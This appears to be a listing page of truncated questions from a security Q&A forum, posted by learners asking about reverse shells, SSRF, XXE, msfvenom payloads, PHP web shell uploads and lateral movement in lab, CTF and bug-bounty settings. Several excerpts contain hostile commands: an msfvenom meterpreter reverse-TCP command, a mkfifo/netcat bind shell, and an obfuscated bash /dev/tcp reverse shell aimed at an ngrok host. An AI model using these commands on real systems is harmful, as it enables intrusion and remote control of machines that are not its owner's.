Collaborate Disseminate
Beginner pentester here.
I’m testing a bug bounty website and found a potential SSRF by url injection trying to fetch for another server in the PSF, which leads the server’s backend to send several POST requests to said url (tested using w… Continue reading How did I manage to reverse shell my own machine?
I have identified an XXE vulnerability in an XML parser of an application that allows external entities.
I used the below crafted xml to do a get request on localhost on port 9090, and on the same machine where the XML parser runs, I start… Continue reading could XXE vulnerability lead to an RCE
I get access to windows powershell with nt authority/system permissions, but this windows have a antivirus. So it doesn’t allow me to install .exe files to make lateral movement. I can’t RDP connect to this PC because it hasn’t public ip.(… Continue reading I have a remote shell, but i can’t nothing to do with it [closed]
I am generating a Python payload using msfvenom with the following command:
msfvenom -p python/meterpreter_reverse_tcp -f raw –platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=9090 -o stageless_payload.py
The payload … Continue reading How can I prevent msfvenom Python payloads from forking without manually decoding the payload?
I am trying to grasp the concept of terminal-emulators, shells and redirections.
I have two commands, both of them start a netcat listener for the bind shell:
1) rm /tmp/fifo; mkfifo /tmp/fifo; cat /tmp/fifo | /bin/bash -i 2>&1 | nc… Continue reading Differences in behavior between two Netcat and FIFO commands for creating a bind shell
I’m performing Overpass the hash attack @ CompTIA Pentest+ > Attacks and Exploits > Lateral Movement and Pivoting > Task 3 > Let’s Get to Work!
I dumped Key of my target user: t1_toby.beck & then attempted to send reverse s… Continue reading Getting reverse shell as another user
I have uploaded a php shell using a file upload vulnerability. But when I hit the .php url after uploading it. It gets downloaded rather than executed. Why is that. And how can I execute my shell code?
This is the URL that it gets uploaded… Continue reading Why does my uploaded shell as .php gets downloaded rather than executed when I hit the URL?
I want to create a reverse shell from my Windows machine to Linux by creating a web link. I would like to know if there any tools to make such links which executes a script to open a reverse shell to Linux.
Continue reading How to create a link that opens a reverse shell from Windows to Linux [closed]
$(/bin/prin[t]f ‘ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27’)
-i: -c: line 1: unexpected EOF while looking for matching `”
I was trying to get a reverse shell in this manner for a CTF cha… Continue reading Reverse Shell payload does not work
I’m using a kali linux VM to try and obtain remote code execution on my personal computer via metasploit.
I’ve created the payload using msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST =(Kali linux IP address) LPORT=… Continue reading Metasploit – No conection between victim and attacker [closed]